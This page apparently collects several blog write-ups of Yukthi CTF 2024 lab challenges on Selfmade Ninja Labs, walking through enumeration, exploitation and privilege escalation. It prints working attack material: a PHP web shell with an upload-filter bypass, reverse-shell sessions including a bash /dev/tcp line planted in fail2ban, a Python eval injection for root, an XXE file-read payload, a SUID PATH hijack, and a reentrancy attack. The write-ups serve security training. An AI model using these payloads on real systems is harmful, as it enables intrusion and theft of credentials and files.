Introduction The Backrooms challenge in the Selfmade Ninja Labs cloud lab training for aspiring students during the Dsocity-Yukthi CTF Prelims 2024 offers an immersive exploration of cybersecurity. Participants tackle critical concepts such as web security, scripting vulnerabilities, and privilege escalation. Through tasks ranging from PHP payload manipulation to Python script analysis, the challenge refines tactical thinking and technical expertise for real-world scenarios. Getting Started with the Backrooms Challenge To participate in the Backrooms challenge, follow these steps: Create an Account Visit Selfmade Ninja Labs and sign in (click here). If you don’t already have an account, create one by (click here) Activate WireGround Once signed in, activate WireGround to set up your lab environment. Open the Challenge Dashboard Go to Selfmade Ninja Labs, and click Machine Labs on the dashboard. Navigate to the left-side navbar, click the dropdown under My Lab, and select Challenge Lab. Locate the Backrooms Challenge Browse the list of challenges on the page. Search for Backrooms and click the corresponding challenge button. Start the Mission Click the Replay the Lab button at the top right of the page. Click Start Mission to begin. Note your IP address for this lab environment. Use VS Code to set up port forwarding before starting the challenge. Key Takeaways from the Backrooms Challenge File Upload Security PHP Payload Crafting Python Script Vulnerability Analysis Markdown Exploitation Root Privilege Escalation Cybersecurity Strategy Enumuration Nmap To further our investigation, we employed Nmap, a powerful network scanning tool, to discover any additional services that might be running on the target machine. After deploying the challenge environment, the IP address was provided, but specific service ports were not immediately apparent. To uncover all open ports on the server, we executed the following Nmap command: nmap -p- ip_address prasaanth2k@essentials:~$ nmap -p- 10.11.2.17 Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-13 08:10 UTC Nmap scan report for e27ebd31ed77421435ee36c5d6235a84.labs_frontend (10.11.2.17) Host is up (0.00010s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 80/tcp open http 86/tcp open mfcobol Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds Upon reviewing the Nmap scan results, it became evident that port 80 was open, while port 86 was running. Such findings often indicate non-standard configurations or intentionally obscured services, possibly as part of the challenge setup. For the initial mission, participants encounter a PHP endpoint embedded within the page, offering the functionality of file upload. While this feature allows users to upload files, attempts with the .php extension are thwarted. However, a clever workaround emerges: utilizing the .php2 extension bypasses this restriction, enabling successful uploads. Thus, armed with this insight, we seamlessly injected the meticulously crafted payload below. <?php system($_GET['cmd']); ?> With this exploit payload successfully uploaded, we gain the ability to execute commands. Leveraging this newfound capability, we initiate the process to establish a reverse shell. By executing specific commands within the uploaded payload, we orchestrate the reverse shell mechanism, effectively enabling us to establish a connection back to our system. This reverse shell serves as a conduit, granting us remote access and control over the compromised system, thereby facilitating further exploration and exploitation of its resources. prasaanth2k@essentials:~$ nc -lvnp 4326 Listening on 0.0.0.0 4326 Connection received on 10.13.1.243 54618 Linux entiti.selfmade.ninja 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux 08:50:24 up 3 days, 5:36, 0 users, load average: 0.68, 0.96, 1.31 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1000(backrooms) gid=1000(backrooms) groups=1000(backrooms),27(sudo) TERM environment variable not set. backrooms@entiti:/$ export TERM=xterm export TERM=xterm backrooms@entiti:/$ export SHELL=bash export SHELL=bash backrooms@entiti:/$ backrooms@entiti:/$ cd ~ cd ~ backrooms@entiti:/home/backrooms$ ls ls backrooms_escape_map.txt backrooms@entiti:/home/backrooms$ cat b cat backrooms_escape_map.txt c3d66019b22a7ee81f2afbe6836e60ae.ninja backrooms@entiti:/home/backrooms$ Foothold and Privilege Escalation Upon obtaining the reverse shell, our enumeration efforts continue, leading us to inspect the sudoers file using the sudo -l command. Within this file, located at /var/www/html, we uncover a Python script. This script is configured to run with elevated privileges, as indicated by its presence in the sudoers file. Examining the contents of this Python script reveals its functionality and potential vulnerabilities, providing us with valuable insights into its operations and the avenues for exploitation it may present. backrooms@entiti:/home/backrooms$ sudo -l sudo -l Matching Defaults entries for backrooms on entiti: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User backrooms may run the following commands on entiti: (ALL : ALL) ALL (ALL) NOPASSWD: /usr/bin/python3 /usr/local/bin/escape_ticket.py def load_file(loc): if loc.endswith(".md"): return open(loc, &#039;r&#039;) else: print("Wrong file type.") exit() def evaluate(ticketFile): code_line = None for i,x in enumerate(ticketFile.readlines()): if i == 0: if not x.startswith("# backrooms"): return False continue if i == 1: if not x.startswith("## Ticket to me"): return False print(f"Destination: {&#039; &#039;.join(x.strip().split(&#039; &#039;)[3:])}") continue if x.startswith("__Ticket Code:__"): code_line = i+1 continue if code_line and i == code_line: if not x.startswith("**"): return False ticketCode = x.replace("**", "").split("+")[0] if int(ticketCode) % 7 == 4: validationNumber = eval(x.replace("**", "")) if validationNumber > 100: return True else: return False return False def main(): fileName = input("Give me the serect key path.n") ticket = load_file(fileName) result = evaluate(ticket) if (result): print("Valid ticket.") else: print("Invalid ticket.") ticket.close main() this python script prompts for the file path of a Markdown (.md) file. Our objective is to fulfill all the conditions outlined within the script. Once these conditions are met, the script will execute and spawn a shell, granting us escalated privileges. To achieve this, we meticulously analyze the script’s requirements and constraints, ensuring that our input satisfies each criterion. Upon successful fulfillment of these conditions, the script’s logic will be triggered, allowing us to exploit any potential vulnerabilities and gain access to the system via the spawned shell Here is the exploit mardown file now we can store this file and give this path to the script # backrooms ## Ticket to me: John Doe __Ticket Code:__ **4+__import__(&#039;os&#039;).system(&#039;/bin/bash&#039;)** $ whoami whoami backrooms $ sudo /usr/bin/python3 /usr/local/bin/escape_ticket.py sudo /usr/bin/python3 /usr/local/bin/escape_ticket.py Give me the serect key path. /var/www/html/exploit.md /var/www/html/exploit.md Destination: me # whoami whoami root # ls ls exploit.md helpthem.php sample.html style.css exploit.php2 index.html script.js upload.php # cd /root cd /root # …

Backrooms-Yukthi CTF Prelims 2024: The Backrooms Challenge Uncovered Read More »

Introduction In the fast-evolving world of cybersecurity, mastering vulnerabilities such as XXE (XML External Entity) and SUID (Set User ID) binary exploitation is crucial for IT professionals. This article explores the Fruity Challenge from the Yukthi CTF Prelims 2024, an excellent opportunity for aspiring IT students to enhance their skills. Participants can learn valuable exploitation techniques and security practices through Selfmade Ninja Lab cloud lab training for aspiring students, which offers hands-on experiences in tackling real-world cybersecurity scenarios. Getting Started with Selfmade Ninja Labs Visit Selfmade Ninja Labs and create an account (Click here) If you don’t have an account, register via Selfmade Ninja Git (Click here) Activate WireGuard on your system. Go back to Selfmade Ninja Labs and navigate to the Machine Labs section on the dashboard. On the left-side navbar, click My Lab > Challenge Lab to access the challenge page. Browse the available challenges and search for “Fruity.” Click the Challenge button to open the Fruity Challenge page. In the top-right corner, click Deploy Lab, then select Start Mission. Copy the provided IP address and use VS Code’s remote SSH extension to forward the port, enabling you to start the challenge. Key Learnings from Selfmade Ninja Lab Cloud Lab Training Through Selfmade Ninja Lab cloud lab training for aspiring students, you’ll master: XXE Exploitation: Learn to manipulate XML entities to access sensitive files. Privilege Escalation: Exploit SUID binaries to gain higher-level privileges. Reconnaissance Tactics: Discover how to gather vital information using tools like Nmap. Exploitation Strategies: Enhance your approach to uncovering vulnerabilities. Environment Variable Manipulation: Understand the significance of altering PATH variables. Penetration Testing Techniques: Develop comprehensive testing skills. Cyber Threat Awareness: Stay ahead by understanding the latest cybersecurity trends. Enumeration Practices: Identify critical information within compromised systems. 1.Initial Reconnaissance with Nmap: Nmap reveals three open ports on the server, laying the groundwork for further investigation.with the nmap -p- command XXE Exploitation The /order endpoint accepts user input, encoding it into base64 encoded XML format before sending it to the /tracker endpoint. Crafting a malicious XML entity allows control over reflected data, leading to sensitive file access. Step 1: Craft a malicious XML payload: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <userdata> <name>&xxe;</name> <mail>test</mail> <subject>test</subject> <comments>test</comments> </userdata> Identify sensitive file (/etc/passwd) revealing a user named "fruit". SSH Key Extraction: Knowing SSH private keys are often stored at /home/$USER/.ssh/id_rsa, target the SSH private key located at /home/fruit/.ssh/id_rsa. Exploit SSH key possession to gain remote server access. Privilege Escalation SUID Binary Exploitation: The log_reader binary, with suid permission, executes as root. Upon execution, it displays Apache log files, hinting at its functionality. Reveal potential command execution by running strings against the binary. Manipulate the PATH variable to control the tail command execution. Create a shell script named tail containing /bin/bash. Trigger the custom tail script to gain an interactive shell with root privileges. There is one binary file called log_reader unser fruit directory. It is a suid binary which is owned by root, which means it can execute functions as root user. Directly running the binary shows us some apache logs file. And running strings against the binary give us an hint about what command it might be running on execution. If the tail is invoked with it’s absolute path (ie: /usr/bin/tail) it would’ve been not exploitable. But because it is suid bit, we can control the PATH variable and the process will have no other choice then using our PATH. We can create a shell script with /bin/bash as its content and name it tail. Placing it under fruit’s home directory and prepending the home dir path to the PATH environmental variable will fool the binary into looking for tail binary in our Home directory first. Conclusion: Mastering Cybersecurity Exploitation The skills learned in challenges like the Fruity CTF Prelims 2024 are invaluable for anyone pursuing a career in cybersecurity. By mastering XXE exploitation and SUID binary privilege escalation, aspiring IT students can better understand the importance of reconnaissance, vulnerability identification, and effective exploitation strategies. With SNA Lab cloud lab training, students can gain hands-on experience in these areas, providing them with the tools needed to protect systems and stay ahead in the dynamic cybersecurity landscape.

Introduction The “Mystic Quest” challenge at the Yukthi CTF 2024 Finals is an exciting two-part cybersecurity adventure designed to test participants’ skills. This journey covers router firmware analysis, SSH access, and system exploitation techniques to achieve privileged access. It’s a true test of ingenuity, technical expertise, and perseverance. Getting Started To begin your journey, follow these steps: Sign in or Create an Account: Go to Selfmade Ninja Labs to sign in (click here) If you don’t have an account, visit Git Selfmade Ninja to create one (click here) Activate WireGuard: Ensure you have WireGuard activated for secure connectivity. Open the Challenge Dashboard: Log in at Selfmade Ninja Labs (click here) Navigate to Machine Labs on the dashboard. Locate the Challenge: On the left navbar, open the My Lab dropdown and select Challenge Lab. Browse the challenges and search for Mystic Quest. lick the Challenge button to proceed. Start the Mission: In the top-right corner, click Replay the Lab, then select Start Mission. You will receive an IP address. Use VSCode to port-forward this IP and start the challenge. What You Will Learn Router Firmware Analysis: Uncover hidden credentials within router firmware. SSH Access: Use discovered credentials for SSH access to a secured system. Fail2ban Exploitation: Gain insights into using fail2ban to escalate privileges and obtain root access. Challenge 1: Magical Door Story Meena, a determined cybercrime investigator, embark on a rescue mission behind a magical door to save a friend. The door, which demands specific words at the right frequency, reveals the first challenge: decrypting an encrypted log file to proceed. Challenge Flow Network Service Discovery: Upon finding a service running on port 12345, I connected using nc {ip} 12345 and was greeted with questions related to the router’s firmware. Firmware Extraction and Analysis: We need to provide an answer for this question. Yes, we received one tar file, and after attempting to extract it, we found two files: firmware.jff2 and log.txt.enc. To find the answers needed by the network service, I extracted the router’s firmware with the command: binwalk -e firmware.jff2 This allowed me to dive deep into the firmware’s contents, searching for clues. Answering Questions and Key Acquisition: Armed with insights from the firmware analysis, I confidently answered the network service’s questions. Each correct response brought me closer to the decryption key I needed. Questions ranged from firmware versions to specific configuration settings, all found within the extracted firmware files. Answering Questions: The first question is about the router firmware version, which I find as 2.0.37.131047 in /etc/version. cd jff2-root/etc cat version The remaining questions and their answers are as follows: DHCP Offer Time: 2024-02-27 19:58:28, DHCP_OFFER, MAC:ba:f4:4b:24:0e:c7, Offered IP: 192.168.1.115 Found in: /var/log/dhcp.log Lighttpd Port Number: 8090 Found in: /etc/init.d/service_httpd/lighttpd.conf Router Hostname: device21 Found in: /etc/hostname Dashboard Access User: casco Found in: /etc/dashboard/users.conf Primary Wireless Network PSK: uyGGHHH87H28UH7655 Found in: /etc/wpa_supplicant.conf Default DHCP Lease Time: 600 Found in: /etc/dhcp/dhcpd.conf SSH Service Port: 2222 Found in: /etc/ssh/sshd_config Router’s LAN Interface IP: 192.168.0.1 Found in: /etc/network/interfaces First Outbound Firewall Rule Destination Port: 84 Found in: /etc/firewall.rules Log File Decryption: With all questions answered correctly, I receive the decryption key and use it to decrypt the log file: openssl enc -d -aes-256-cbc -in log.txt.enc -out log_decrypted.txt -pass pass:HYT989BVGljwn234hdnjn98 192.168.1.150 – – [27/Feb/2024:14:45:33 +0000] "GET /login.asp?username=admIn&password=PasSqwa0rd HTTP/1.1" 200 1745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" The decrypted log reveals login credentials admIn and PasSqwa0rd. SSH Access and Flag Retrieval: I use above the credentials to SSH into the machine and navigate to /home/callio.friend to discover the first flag. Challenge 2: Illusionary Block After the initial victory, my journey with Callio took a new turn at the illusionary block. Armed with determination, we aimed to conquer this obstacle and retrieve the diamonds from the /root directory. Exploitation Flow Investigating Sudo Privileges: To devise our strategy, I first inspected our sudo privileges, revealing a critical detail: (ALL) NOPASSWD: /usr/sbin/service fail2ban restart This discovery indicated we could manipulate the fail2ban service without entering a password, presenting a unique opportunity for exploitation. sudo -l cat /etc/fail2ban/jail.local Fail2ban Configuration Exploration: Delving into fail2ban’s configuration, I used cat /etc/fail2ban/jail.local to understand its mechanisms better and identify any potential vulnerabilities. This exploration was crucial for planning our next steps. Adjusting Fail2ban for Reverse Shell Execution: Recognizing an opportunity in the fail2ban configuration, I decided to modify its action to trigger a reverse shell back to my machine. However, the action files in /etc/fail2ban/action.d/ were protected. To circumvent this, I employed a creative workaround: cd /etc/fail2ban/action.d/ cp -r nfts-new.conf tt && mv tt nfts-new.conf This command duplicated the nfts-new.conf file, effectively changing its ownership to my user, allowing me to insert the reverse shell script. Implementing the Reverse Shell: With the file now editable, I replaced the existing ban action with a reverse shell command targeting my listener: bash -c 'bash -i >& /dev/tcp/10.0.12.15/4444 0>&1' This setup was designed to establish a backdoor into the system upon the fail2ban service’s restart. Activating the Reverse Shell: To bring our plan to fruition, I restarted the fail2ban service using our sudo privilege: sudo /usr/sbin/service fail2ban restart Concurrently, I had set up a listener on my local machine to catch the incoming reverse shell:nc -lnvp 1234 Gaining Root Access: The final step involved triggering the reverse shell by intentionally failing seven SSH login attempts, knowing fail2ban would ban the IP and execute our reverse shell script. After the seventh failed attempts, the reverse shell connected to my listener, granting me root access to the system. Retrieving the Diamonds: With root access secured, I navigated to the /root directory to claim our ultimate prize, the diamonds, symbolized by the second flag. Conclusion The “Mystic Quest” challenge in the Yukthi CTF 2024 Finals was an exhilarating experience that took us through complex scenarios, from router firmware analysis to exploiting fail2ban. Throughout this journey, I gained valuable insights into cybersecurity, including the importance of system exploration and understanding how to exploit vulnerabilities in security tools like fail2ban. …

Mystic Quest – Yukthi CTF 2024 Finals: A Journey Through Cybersecurity Challenges Read More »

Introduction In the Yukthi CTF 2024 Finals, "Magical Ancient" presents an exciting blockchain-based adventure. Participants will navigate through smart contract complexities, performing reentry attacks and exploiting contract loopholes to acquire special tokens. This challenge provides a hands-on learning experience, particularly for aspiring IT students interested in blockchain security and smart contract exploitation. Getting Started with Selfmade Ninja Labs To begin your journey with Selfmade Ninja Lab cloud lab training for aspiring students, follow these steps: Sign Up on Selfmade Ninja Labs Visit Selfmade Ninja Labs to create your account (Click here) If you don’t have an account, use Git Selfmade Ninja Sign-In to register (Click here) Activate WireGuard: Ensure WireGuard is activated for seamless access. Access the Labs: Navigate to the Selfmade Ninja Labs Dashboard Click on Machine Labs from the main dashboard. Select Your Challenge: On the left navbar, click My Lab dropdown, then select Challenge Lab. Browse the list of challenges and search for Magical Ancient. Click the Challenge button. Deploy and Start the Mission: On the top-right of the screen, click Replay the Lab to redeploy it. Click Start Mission to begin. Port Forwarding: Use the provided IP in your terminal or Visual Studio Code (VS Code) to set up port forwarding. Once done, you’re ready to start the challenge. What You Will Learn Blockchain Reentry Attack: Understand the vulnerabilities within smart contracts that allow for reentry attacks. Smart Contract Analysis: Learn how to dissect and analyze BSC (Binance Smart Chain) smart contracts to identify exploitable loopholes. Interacting with Smart Contracts: Gain practical experience using tools like Remix IDE and Metamask to interact with and exploit contracts on the blockchain. Selfmade Ninja Lab Cloud Lab Training: This challenge provides an ideal environment for aspiring IT students to refine their skills through practical, cloud-based training in blockchain and smart contract security. Challenge 1: Magic Quest Story Upon discovering the village magician’s plight, with his magical sticks locked away, you embark on a quest to recover them. The journey starts with unlocking a door using a key hidden within smart contract files. Challenge Flow Initial Discovery: An nmap scan uncovers an open port 80, revealing a website that prompts for a key. This initial discovery sets the stage for the challenges ahead, indicating the need to navigate through blockchain vulnerabilities to proceed. Based on the Nmap scan, I found that port 80 is open. I then performed port forwarding and accessed the web service on my local machine. Contract Analysis: The journey into blockchain exploitation begins with the extraction of blocksna.tar.gz, revealing two significant contracts: etherstorage.sol and attacker.sol. These contracts hint at a reentry attack scenario, a common vulnerability within smart contracts that allows for unauthorized Ether withdrawals. tar -xzvf blocksna.tar.gz Delving deeper, you utilize Remix IDE to thoroughly analyze the contracts, pinpointing the precise vulnerability that will allow for the reentry attack. This step is critical, as understanding the contract’s logic is key to crafting a successful exploitation strategy. Performing the Attack: The attack phase begins with the deployment of the EtherStorage contract. This contract acts as the target for your reentry attack, storing Ether that you aim to extract unlawfully. After deploying EtherStorage, you make an initial deposit of Ether to simulate a real-world scenario where the contract holds funds. With EtherStorage set up and funded, the next critical step involves deploying attacker.sol. This contract is designed to exploit the reentry vulnerability in EtherStorage. By feeding it the address of the EtherStorage contract, you prepare attacker.sol to interact directly with the target. The climax of the attack is reached when you execute the attack function within the attacker.sol contract, sending along 1 Ether as bait. This triggers the reentry exploit, allowing you to withdraw all the Ether contained within EtherStorage, far exceeding the initial amount sent. Successful execution of the attack not only retrieves the key 1tnettech398ytfl35tester7tech but also demonstrates the attack’s effectiveness by significantly increasing your Ether balance by 4 Ether — a clear sign of victory in the world of blockchain security. Challenge 2: Final Triumph Story With the key from the first challenge in hand, your journey to revive the old magician’s stick by securing a special coin from the blockchain network begins. Challenge Flow Website Interaction: You’re greeted by a webpage that features two crucial buttons: "Connect to Metamask" and "Check Balance," setting the stage for your task. Setting up the BSC Testnet in Metamask: Before proceeding, you ensure your Metamask is configured for the BSC testnet, enabling transactions and interactions with the contract. Acquiring Test BNB: To engage with the contract, you acquire Test BNB from a faucet, providing the necessary funds for transactions. Connect to BSC Testnet RPC URL: Open this URL in your browser: BSC Testnet Chain Connect your wallet using your Metamask account by following the instructions on the page. Now, your account is connected to the BSC Testnet. Accessing the Token Contract: With Metamask ready and Test BNB in hand, you navigate to the specified token address on BSC Scan, initiating your contract analysis. Analyzing the Contract: A thorough examination of the contract functionalities on BSC Scan uncovers a loophole for acquiring SNA tokens, pivotal for advancing in your quest. Exploiting the User Function: To buy tokens, you discover the need to be an addedUser. Successfully exploiting the User function with your address and a 3-digit even number, you’re added as an authorized user. Buying SNA Tokens: As an addedUser, you interact with the buyToken function to purchase SNA tokens, a crucial step towards your goal. Verifying Token Acquisition: Returning to the initial webpage, you verify your SNA token balance, confirming the successful acquisition of the tokens and, consequently, the restoration of magical power to the magician’s stick. Conclusion The "Final Triumph" challenge concludes with the restoration of the magician’s stick, demonstrating the participant’s ability to navigate complex blockchain interactions and exploit smart contract vulnerabilities. This challenge highlights the value of Selfmade Ninja Lab cloud lab training for aspiring IT students, offering practical training in blockchain security …

Magical Ancient – Yukthi CTF 2024 Finals Read More »

Introduction "Security Unveiled" in the Yukthi CTF 2024 Finals presents an immersive challenge encompassing disk image analysis, credential recovery, and exploiting an access token bypass vulnerability. Participants delve into the intricacies of digital forensics and cybersecurity, unraveling secrets to secure privileged access within a simulated IT environment. What You Will Learn Disk image analysis and data recovery techniques. Deciphering encrypted data to extract credentials. Conducting network scans to identify service entry points. Web application security testing to exploit vulnerabilities. Real-world application of cybersecurity concepts in a CTF context. Challenge 1: Credential Hunt Story Accepted into Bout Tech, an IT company devoid of a conventional hierarchical structure, the task at hand was to recover the previous maintainer\’s work credentials from a raw image file left behind. This initial step was crucial for accessing the maintainer dashboard, pivotal for my new role. Challenge Flow Disk Image Analysis: Starting with sdb1.img, the challenge involved mounting the image and exploring its contents. sudo mkdir /mnt/image_mount sudo losetup -fP –show ./sdb1.img sudo mount /dev/loop0p1 /mnt/image_mount cd /mnt/image_mount ls -l Decrypting Data: Encountering data.json.enc, a file encrypted with OpenSSL, and discovering the .Trash directory, which led to the crucial find of report.docx. After converting the DOCX to a zip and extracting, bout.jpg was found. Finding report.docx: Extracting bout.jpg: Using steghide, a decryption key was retrieved from bout.jpg. mv report.docx report.zip unzip report.zip steghide extract -sf bout.jpg Credential Recovery: With the decryption key, the data.json.enc file was decrypted to reveal the username and password. openssl enc -aes-256-cbc -d -in data.json.enc -out data_decrypted.json -pass pass:jhdfe98hh Credentials found: { username:clat, location:us, pass:clat@098 } Accessing the Dashboard: After conducting a network scan, port 80 was found to be open. The recovered credentials allowed dashboard access, revealing the first flag. Network Scan: Dashboard Access: After I logged in with the above credentials, I got my first flag in the dashboard section. Challenge 2: Security Breach Story After getting into the system, I discovered I needed admin access to do my job. The website had two login methods: one with a username and password and another with a token sent to your email. Challenge Flow Exploring Login Methods: The token-based login caught my interest, especially since I didn\’t have the admin privileges required for deeper access. Finding an Admin User: I found an admin email, wilson@bout.com, which seemed like a lead to gaining admin access. Token System Exploit: I noticed a flaw in the token system that allowed requesting a token for both my account and the admin\’s with a single submission: wilson@bout.com&clat@bout.com Receiving the Admin Token: The exploit worked, and I received an email with the admin token. Admin Access Achieved: Armed with the admin token, I proceeded to log into the admin area of the website. This crucial step allowed me to navigate the secured sections and ultimately, locate the second flag. Successfully gaining admin access not only demonstrated the vulnerability within the token system but also underscored the importance of rigorous security practices in web applications. Conclusion The "Security Breach" challenge within the Yukthi CTF 2024 Finals vividly underscored the critical nature of cybersecurity vigilance. By navigating through digital forensics to uncovering and exploiting a web application vulnerability, this challenge exemplified the multifaceted approach required in today\’s cybersecurity landscape. It served as a profound reminder of the ongoing need for cybersecurity professionals to adapt, innovate, and anticipate potential vulnerabilities to safeguard digital infrastructure effectively.